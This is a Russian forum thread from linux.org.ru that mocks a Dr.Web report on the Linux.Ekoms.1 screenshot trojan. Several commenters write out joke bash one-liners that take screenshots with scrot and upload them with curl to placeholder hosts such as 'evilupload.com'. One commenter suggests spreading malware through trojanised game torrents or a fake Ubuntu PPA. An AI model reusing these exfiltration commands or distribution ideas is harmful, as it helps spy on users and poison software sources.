LINUX.ORG.RU
ФорумTalks

Троянец для Linux делает скриншоты

 , ,


1

0

Вирусные аналитики компании «Доктор Веб» исследовали очередное творение вирусописателей, получившее наименование Linux.Ekoms.1, — эта вредоносная программа умеет с определенной периодичностью делать на инфицированном компьютере снимки экрана и загружать на зараженную машину различные файлы.

Подробности

Перемещено Klymedy из security

★★★★

Ответ на: комментарий от Psych218

Такой троянецпишется на баше в три строки. Новость так новость!
Ну с загрузкой файлов будет побольше строк, да. Надо будет ещё wget вызывать ☺

зачем?

#!/bin/bash
scrot /tmp/virus.png
curl -X POST -F /tmp/virus.png https://evilupload.com/upload/

BaBL ★★★★★
()
Ответ на: комментарий от alozovskoy

Судя по описанию файлы скачиваются, а не скриншоты загружаются.

ну я чисто схематически расписал, но вообще - загружаются, -F -
это форм, просто параметр должен быть -F «image=/tmp/virus.png», а так вроде бы все верно? Отправляем ПОСТ с формой с изображением на ивилхост и там сейвимх

P.S.: А, сорри, перечитал ТС, да, тогда это просто wget -i https://evilhost/toupload.txt =)

BaBL ★★★★★
()
Последнее исправление: BaBL (всего исправлений: 1)

"Дохтур веб" в своём репертуаре.

StReLoK ☆☆
()

Очередной однострочник на баше, КСЖ.

entefeed ☆☆☆
()

Пока весь офис судорожно бегал по интернетам, звонил на корневые днс и искал инфу, я установил dr web на все линукс хосты. Прогнал 3х часовой тест на серверах. Антивирус нашел 3 подозрительных файла включая этот троян. Удалось отследить соединение на вражеский сервер, им оказался сайт пентагона. Ушли как минимум записи разговора глав. админа с бухгалтершой Ленкой и 2 скриншота с xchat'ом.

unt1tled ★★★★
() автор топика

Это они так остроумно хотят склонить к покупкам их продукта?

iu0v1
()
Ответ на: комментарий от Deleted

чтобы этот ужас перестал поститься

Всем лорчанам-линуксоидам срочно поставить Доктор Веб!

cipher ★★★★★
()
Последнее исправление: cipher (всего исправлений: 1)

комменты по ссылке обрадовали

такое чувство, что их сами сотруднички drweb пишут

reprimand ★★★★★
()

А фреймбуфер и вайлэнд он поддерживает?

MLP_Fan ★★
()
Ответ на: комментарий от peregrine

Ну пока я вижу два способа

Протроянивать игры. На торрентах видел, что люди прям пердолятся и обсуждают как какой-нибудь поставить линуксовый халф лайв, которому цена чашка кофе в стиме.

Создать левое ppa под туже ubuntu. Пакеты выбрать по популярности в поисковиках к словам 'ppa'. Ну и полезную нагрузку к этим пакетам добавить.

Но низкая популярность линуксов само собой малину портит в экономическом плане, разве что для чистого фана.

fornlr ★★★★★
()
Ответ на: комментарий от lexxus-lex
while true; do scrot /tmp/virus.png && curl -X POST -F "image=@/tmp/virus.png" "https://evilupload.com/upload/"; sleep 30m; done;

в одну строку

Deleted
()

Даже не смешно. У народа вон на главной эксплойт не работает, вот это реально проблема.

anc ★★★★★
()

А вот интересно. Это Др.Веб практикуется и пытается написать хоть какой-нибудь вирус для линукса?

ekzotech ★★★★
()
Ответ на: комментарий от loz

К слову, у нас китайцы на одну тестовую виртуалку со слабым паролем закинули трояна. Он был просто статически слинкован, и не заработал, т.к. i386, а с машины была напрочь выпилен multilib, ибо там не предполагается легаси код вообще.

svr4
()
Ответ на: комментарий от nexfwall

Но ведь не у всех стоит scrot.

Когда-то целью троянов были все?

Psych218 ★★★★★
()

Это скорее полезный инструмент. Особенно оверам =)

gssomi ★★
()

Для Ъ

Прямо эпидемия в среде Линуксов.

Опасный троянец для ОС Linux! Спасибо за предупреждение и подробности!

теряем линукс ...

Без паники!

Сигнатура Linux.Ekoms.1 добавлена в вирусные базы, и потому этот троянец не представляет опасности для пользователей Антивируса Dr.Web для Linux.

Доктор Веб защитит все операционные системы от любых угроз!!!)))

ashot ★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.